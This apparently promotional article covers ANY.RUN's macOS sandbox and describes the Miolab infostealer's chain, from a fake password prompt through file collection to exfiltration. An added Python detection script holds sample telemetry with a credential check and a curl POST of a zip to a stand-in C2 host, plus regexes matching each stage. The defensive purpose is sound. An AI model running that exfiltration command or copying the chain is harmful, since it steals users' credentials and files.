ANY.RUN has taken a significant step forward by expanding its interactive sandbox platform to support macOS virtual machines. Currently available in beta for Enterprise Suite users, this new capability allows security teams to analyze Apple-focused threats within a unified environment already used for Windows, Linux, and Android investigations.

As modern enterprises increasingly rely on multiple operating systems, security operations centers (SOCs) must adapt quickly. Today, organizations no longer function within a single OS ecosystem. Instead, teams must detect and respond to threats across diverse platforms—often under intense time pressure.

Notably, engineering, product, and leadership teams heavily depend on macOS devices. Because these users often access sensitive business data, internal systems, and proprietary code repositories, they have become prime targets for cyber threats. However, despite the growing adoption of macOS in corporate environments, many SOC workflows have struggled to keep pace.

Consequently, analysts frequently rely on separate tools to investigate macOS-specific threats. This fragmented approach not only slows down investigations but also creates inefficiencies across the entire response cycle. As a result, organizations experience slower alert triage, extended investigation timelines, increasing alert backlogs, higher Mean Time to Respond (MTTR), and even analyst burnout.

ANY.RUN’s macOS Sandbox Expansion

To address these challenges, ANY.RUN has extended its cross-platform sandbox capabilities to macOS. Now, Enterprise Suite users can analyze suspicious files and URLs across four major operating systems within a single workflow. This unified approach eliminates the need to switch between disconnected tools.

Moreover, analysts can now observe complete macOS execution behavior—including process activity, file system changes, network connections, and API calls—within the same interface they already use for other operating systems.

A standout feature of this expansion is the platform’s interactive analysis capability. Some macOS threats are specifically designed to remain inactive until a user performs certain actions, such as entering a password or approving system prompts. Traditional automated sandboxes often fail to detect such behavior, leaving critical threats unnoticed.

In contrast, ANY.RUN’s interactive environment enables analysts to simulate real user actions during sandbox execution. This approach helps uncover credential harvesting dialogs, staged execution chains, and social engineering tactics that passive analysis might overlook.

For example, the Miolab Stealer demonstrates the practical value of this solution. This macOS-targeting infostealer uses a lightweight ~100 KB C-based payload compatible with both Intel x86-64 and Apple Silicon ARM64 architectures. When analyzed within the ANY.RUN sandbox, its entire attack chain becomes visible.

On execution, Miolab displays a fake macOS authentication prompt and validates credentials using the dscl -authonly command. The malware halts its operation unless it successfully captures user credentials.

Once authentication succeeds, it leverages system_profiler to gather system and hardware data. Then, it executes an AppleScript routine using osascript to scan directories such as Desktop, Documents, and Downloads for files with extensions like PDF, TXT, and RTF. These files are collected and renamed sequentially, with the total collection capped at approximately 10 MB.

Next, the malware compresses the data into a ZIP archive using the ditto utility and exfiltrates it to a command-and-control server via an HTTP POST request executed with curl. Finally, it displays a fake error message to disguise its malicious activity as a system failure.

Key behavioral indicators identified within the sandbox include osascript-based deceptive prompts, AppleScript-driven file collection, ditto archive creation, and outbound data transfers using curl.
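The chain above lends itself to a sequence-based detection rule. The following is an added example, not code from ANY.RUN or from the article: it parses constructed process-start events in a hypothetical "timestamp pid parent-pid command line" format, groups them by parent process, and reports which Miolab-like stages the children pass through in order.

```python
import re

# Constructed sample telemetry (not real sandbox output). Hypothetical format:
# "<time> <pid> <ppid> <command line>". Parent 412 mimics the Miolab chain;
# parent 300 is an unrelated, benign curl to show the rule does not fire on it.
SAMPLE_EVENTS = """\
10:00:01 501 412 /usr/bin/osascript -e display dialog "macOS needs to verify your password"
10:00:04 502 412 /usr/bin/dscl . -authonly jsmith [REDACTED]
10:00:05 503 412 /usr/sbin/system_profiler SPHardwareDataType
10:00:06 504 412 /usr/bin/osascript /tmp/collect.scpt
10:00:09 505 412 /usr/bin/ditto -c -k --sequesterRsrc /tmp/out /tmp/out.zip
10:00:10 506 412 /usr/bin/curl -X POST -F file=@/tmp/out.zip http://c2.example/upload
10:01:00 507 300 /usr/bin/curl https://updates.example/manifest.json
"""

# Ordered stages matching the behaviors described for the stealer.
STAGES = [
    ("fake_auth_prompt", re.compile(r"osascript .*display dialog", re.I)),
    ("credential_check", re.compile(r"\bdscl\b .*-authonly")),
    ("host_recon",       re.compile(r"\bsystem_profiler\b")),
    ("file_collection",  re.compile(r"osascript .*\.scpt")),
    ("staging_archive",  re.compile(r"\bditto\b .*-k.*\.zip")),
    ("exfil_post",       re.compile(r"\bcurl\b .*(-X POST|-F |--data)")),
]

def parse_events(text):
    """Split each line into (time, pid, ppid, command line)."""
    events = []
    for line in text.splitlines():
        ts, pid, ppid, cmd = line.split(" ", 3)
        events.append((ts, int(pid), int(ppid), cmd))
    return events

def match_chain(text):
    """Return {ppid: [stage names]} for stages hit in order by each parent's children.
    A stage may be skipped, but stages never match out of sequence."""
    by_parent = {}
    for _ts, _pid, ppid, cmd in parse_events(text):
        by_parent.setdefault(ppid, []).append(cmd)
    results = {}
    for ppid, cmds in by_parent.items():
        hit, next_stage = [], 0
        for cmd in cmds:
            for i in range(next_stage, len(STAGES)):
                if STAGES[i][1].search(cmd):
                    hit.append(STAGES[i][0]); next_stage = i + 1; break
        results[ppid] = hit
    return results

def verdict(stages, threshold=4):
    """Flag a parent once enough of the chain is observed (threshold is a tunable assumption)."""
    return "suspicious" if len(stages) >= threshold else "benign"

if __name__ == "__main__":
    for ppid, stages in match_chain(SAMPLE_EVENTS).items():
        print(ppid, verdict(stages), stages)
```

Run against real EDR or sandbox process telemetry, the parser line is the only part that needs adapting to the actual event format; the stage regexes and ordering logic carry over unchanged.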

Ultimately, integrating macOS into ANY.RUN’s sandbox significantly improves SOC performance. It enables faster alert validation, shorter investigation cycles, broader detection coverage, higher analyst productivity, and reduced alert backlogs—especially during phishing campaigns or malware outbreaks.

By eliminating the need for separate macOS testing environments, security teams can focus more on responding to real threats rather than managing tools. This advancement directly reduces business risk, particularly for organizations where Apple devices play a critical operational role.
